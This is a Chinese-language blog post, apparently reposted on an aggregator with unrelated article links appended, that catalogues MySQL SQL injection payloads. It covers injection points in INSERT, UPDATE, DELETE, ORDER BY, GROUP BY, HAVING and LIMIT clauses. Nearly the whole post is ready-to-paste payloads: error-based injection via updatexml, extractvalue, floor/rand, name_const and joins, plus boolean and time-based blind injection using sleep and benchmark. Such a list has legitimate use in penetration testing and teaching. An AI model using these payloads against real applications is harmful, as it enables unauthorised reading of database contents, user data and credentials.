Mysql 下 Insert、Update、Delete、Order By、Group By注入
Insert:
语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)
报错注入:
insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');
insert into test(id,name,pass) values (6,'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');
盲注:
//根据or之间的表达式是否成立来进行盲注
'or 1=1 or ' //插入的测试语句直接当成sql语句执行,并把存储返回值,表达式成立,返回结果为1
'or 1=2 or ' //表达式不成立,返回结果为0
' or exists(select * from information_schema.tables) or' //返回结果为1
aaa' or length(database())=11 or '//返回正确
aaa' or mid(database(),1,1)='t' or'//返回正确
aaa' or mid(database(),1,11)='test' or '//返回正确
insert into test(id,name,pass) values (2,'mis1',''or ascii(mid(database(),1,1))=116 or'')
时间盲注:
insert into test(id,name,pass) values (2,'mis1',''or if(mid(database(),1,1)='a',sleep(10),0) or'')
Update:
update test set pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or''WHERE id=2 and name='0';
update test set pass='baidu' or extractvalue(1,concat(0x7e,database())) or''WHERE id=2 and name='0';
Delete:
DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or'';
DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or'';
Order by:
order by [id]---【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
order by [id] desc/asc ---【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
Limit 0,1:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】
报错注入:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:
SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE 'w', BENCHMARK(5000000,SHA1(1)),5)))),1);
Group by:
group by username --【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
Having :
Having 1=1 --【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
Mysql报错注入:
1、通过floor报错
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
2、ExtractValue
and extractvalue(1, concat(0x5c,(select user())))
3、UpdateXml
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4、利用NAME_CONST注入
and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
5、join报错注入
mysql> select * from(select * from users a join users b)c;
mysql> select * from(select * from users a join users b using(id))c;
mysql> select * from(select * from users a join users b using(id,name))c;
Mysql盲注:
#select * from test where id =2 and length(version())=6
#select * from test where id =2 and ascii(substring(version(),7,1))>1
#select * from test where id =2 and length(database())=4
#select * from test where id =2 and ascii(mid(database(),4,1))=116
#select * from test where id =2 and (select length(version()))=6
#select * from test where id =2 and (select count(*) from test)=3
Mysql时间盲注:
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)
#select * from test where id =2 and if(substring(user(),1,1)='r',sleep(5),0)
#select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

参考资料:
1、 Mysql报错注入原理分析(count()、rand()、group by)
3、利用insert,update和delete注入获取数据
Mysql 下 Insert、Update、Delete、Order By、Group By注入的更多相关文章
- mysql数据恢复 insert\update\delete 工具MyFlash
一.简介MyFlash是由美团点评公司技术工程部开发维护的一个回滚DML操作的工具.该工具通过解析v4版本的binlog,完成回滚操作.相对已有的回滚工具,其增加了更多的过滤选项,让回滚更加容易. 该 ...
- mysql 事务是专门用来管理insert,update,delete语句的,和select语句一点不相干
1.mysql 事务是专门用来管理insert,update,delete语句的,和select语句一点不相干 2.一般来说,事务是必须满足4个条件(ACID): Atomicity(原子性).Con ...
- JDBC基础篇(MYSQL)——使用statement执行DML语句(insert/update/delete)
注意:其中的JdbcUtil是我自定义的连接工具类:代码例子链接: package day02_statement; import java.sql.Connection; import java.s ...
- PHP5: mysqli 插入, 查询, 更新和删除 Insert Update Delete Using mysqli (CRUD)
原文: PHP5: mysqli 插入, 查询, 更新和删除 Insert Update Delete Using mysqli (CRUD) PHP 5 及以上版本建议使用以下方式连接 MySQL ...
- [Hive - LanguageManual] DML: Load, Insert, Update, Delete
LanguageManual DML Hive Data Manipulation Language Hive Data Manipulation Language Loading files int ...
- insert update delete 语法 以及用法
insert update delete 被称为 数据定义语句语句 也就是数据的增加 修改 删除 其中不包括查询 譬如: create database -创建数据库 alter database - ...
- mybatis select/insert/update/delete
这里做了比较清晰的解释: http://mybatis.github.io/mybatis-3/java-api.html SqlSession As mentioned above, the Sql ...
- LINQ体验(9)——LINQ to SQL语句之Insert/Update/Delete操作
我们继续讲解LINQ to SQL语句,这篇我们来讨论Insert/Update/Delete操作.这个在我们的程序中最为常用了.我们直接看例子. Insert/Update/Delete操作 插入( ...
- 关于MyBatis mapper的insert, update, delete返回值
这里做了比较清晰的解释: http://mybatis.github.io/mybatis-3/java-api.html SqlSession As mentioned above, the Sql ...
- sql中同一个Trigger里同时包含Insert,Update,Delete
sql中同一个Trigger里同时包含Insert,Update,Delete SQLServer是靠Inserted表和Deleted表来处理的,判断一下就可以了,只不过比ORACLE麻烦一点 cr ...
随机推荐
- Delphi的TListView控件拖放选定行操作
http://www.tansoo.cn/?p=401 Delphi的TListView控件拖放选定行操作的例子,效果图如下:TListView控件拖动选定行到指定位置 具体实现步骤: 一.新建一个D ...
- 过滤器 Filter
Filter(过滤器)简介 Filter 的基本功能是对发送到 Servlet 的请求进行拦截, 并对响应也进行拦截. Filter 程序是一个实现了 Filter 接口的 Java 类,与 Serv ...
- MonoRail学习-入门实例篇
1.到官方网站下载安装文件,地址如下: http://www.castleproject.org/index.php/Castle:Download目前最新版本Beta5(您也可以不需要下载,直接使用 ...
- HTTP状态代码
1xx(临时响应)表示临时响应并需要请求者继续执行操作的状态代码. 100 (继续) 请求者应当继续提出请求. 服务器返回此代码表示已收到请求的第一部分,正在等待其余部分. 101 (切换协议) 请求 ...
- Problem A 栈
Description You are given a string consisting of parentheses () and []. A string of this type is s ...
- Mysql5.0以上 手工注入
Mysql5.0以上 order by 23 http://www..com/productdet.php?&id=89 and 1=2 UNION SELECT 1,2,3,4,5,6,7, ...
- 收藏的博客--PHP
32位Win7下安装与配置PHP环境(一至三) http://blog.csdn.net/yousuosi/article/details/9448903
- android onclick onLongClick ontouch dispatchTouchEvent onInterceptTouchEvent
android onclick onLongClick ontouch dispatchTouchEvent onInterceptTouchEvent 按ACTION_DOWN -> onLo ...
- 团队开发——冲刺1.a
冲刺阶段一(第一天) 1.今天准备做什么? 在了解C#的基础上,深入熟悉Windows窗体应用程序,熟练掌握基本功能. 2.明天做什么:简单设计界面.
- 属性的定义以及@synthesize的使用
1.属性通常是指某些由对象封装或储存的数据.它可以是标志(如名称或颜色),也可以是与一个或多个其他对象的关系. 2.属性的基本声明使用 @property 编译器指令,后面紧跟属性的类型信息和名称.您 ...